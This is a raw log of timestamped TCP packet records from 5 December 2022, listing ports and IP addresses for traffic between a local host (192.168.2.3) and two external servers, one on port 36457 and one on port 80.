Dec 5, 2022 01:32:29.154269934 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.154499054 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.154616117 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.154681921 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.155668974 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.156109095 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.156559944 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:29.156713963 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:29.157202959 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.157507896 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.157675982 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.157751083 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.157871962 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.158195019 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.158416986 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.158584118 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.158660889 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.159229994 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:29.159351110 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:29.186103106 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.186465979 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.186500072 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.186608076 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.186831951 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.187108040 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.187237978 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.187304020 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.187433958 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.187508106 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.187670946 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.187788010 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.187868118 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.188188076 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.188309908 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.188550949 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.188582897 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.188746929 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:29.188869953 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.189043045 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.189590931 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.189696074 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.189801931 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.189981937 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.190102100 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.190222979 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.190346003 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.190391064 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.190433025 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.218091965 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.218142986 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.218173027 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.218372107 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.218403101 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.218610048 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.218806982 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.218966961 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.219175100 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.219407082 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.219602108 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.219681978 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.219922066 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.220078945 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.220196009 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.220316887 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.220401049 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.220520973 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.239784002 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.240279913 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:29.287693977 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.291112900 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:29.342372894 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.392169952 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:30.147691011 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:30.164942026 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:30.165163040 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:30.165458918 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:30.182356119 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:30.211631060 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:30.211694956 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:30.211728096 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:30.211769104 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:30.211812019 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:30.211853981 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:30.211896896 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:30.211937904 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:30.211980104 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:30.211983919 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:30.212023973 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:30.212038040 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:30.212066889 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:30.212104082 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:30.212114096 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:30.212157965 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:30.212181091 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:30.212199926 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:30.212269068 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:30.212272882 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:30.212347984 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:30.212419033 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:30.213068008 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:30.213112116 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:30.213154078 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:30.213196039 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:30.213196039 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:30.213269949 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:30.213763952 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:30.213809013 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:30.213848114 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:30.213905096 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:30.267334938 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:30.883254051 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:30.942090034 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.212901115 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.212961912 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.213006020 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.213049889 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.213067055 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.213092089 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.213135958 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.213144064 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.213176966 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.213215113 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.213219881 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.213274956 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.213876963 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.213922977 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.213963032 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.213980913 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.214004993 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.214056015 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.214689016 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.214732885 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.214773893 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.214785099 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.214817047 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.214868069 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.215522051 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.215569019 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.215607882 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.215650082 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.215660095 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.215703964 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.216331959 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.216377020 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.216423988 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.216430902 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.216485023 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.216538906 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.217128992 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.217196941 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.217255116 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.217258930 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.217303991 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.217355967 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.217919111 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.217962980 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.218004942 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.218024969 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.218046904 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.218174934 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.218744993 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.218791008 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.218833923 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.218864918 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.218894958 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.218951941 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.219553947 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.219604969 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.219645977 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.219659090 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.219687939 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.219742060 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.220367908 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.220566988 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.220607996 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.220623016 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.220650911 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.220694065 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.220705986 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.221369982 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.221421003 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.221441984 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.221462011 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.221503973 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.221522093 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.222203970 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.222240925 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.222259998 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.230192900 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.230237961 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.230277061 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.230297089 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.230367899 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.230451107 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.230494022 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.230556965 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.230580091 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.230597973 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.230659008 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.231276035 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.231318951 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.231359005 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.231400013 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.231404066 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.231462955 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.232089043 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.232134104 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.232176065 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.232215881 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.232225895 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.232266903 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.232873917 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.232904911 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.232959986 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.233067989 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.233108997 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.233150005 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.233165979 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.233192921 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.233248949 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.233877897 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.233963013 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.234005928 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.234020948 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.234046936 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.234097958 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.234765053 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.234807014 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.234847069 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.234884977 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.234920025 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.234980106 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.235529900 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.235574961 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.235615969 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.235632896 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.235657930 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.235718966 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.236362934 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.236406088 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.236447096 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.236455917 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.236489058 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.236541986 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.237135887 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.237179041 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.237221003 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.237231970 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.237265110 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.237313986 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.237929106 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.238287926 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.238329887 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.238342047 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.238372087 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.238414049 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.238420010 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.238461971 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.238538027 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.247153997 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.247199059 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.247239113 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.247281075 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.247335911 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.247376919 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.247410059 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.247423887 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.247423887 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.247423887 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.248219013 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.248265982 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.248298883 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.248310089 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.248354912 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.248364925 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.248397112 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.248444080 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.248450041 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.248488903 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.248533964 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.248539925 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.249743938 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.249785900 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.249803066 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.249828100 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.249871016 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.249878883 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.249912024 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.249949932 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.249958992 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.250926018 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.250969887 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.251008987 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.251013994 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.251051903 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.251065016 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.251096010 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.251137018 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.251143932 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.251178026 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.251219988 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.251223087 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.252417088 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.252461910 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.252480030 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.252504110 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.252547979 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.252561092 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.252589941 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.252630949 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.252638102 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.252674103 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.252723932 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.254000902 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.254045963 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.254086971 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.254096031 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.254128933 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.254168987 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.254175901 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.254211903 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.254251957 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.254260063 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.254296064 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.254348040 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.255305052 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.255351067 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.255383015 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.255410910 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.255425930 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.255469084 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.255475998 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.255511999 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.255557060 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.255562067 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.255599022 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.255640984 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.255650043 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.264519930 CET	80	49704	66.235.200.147	192.168.2.3
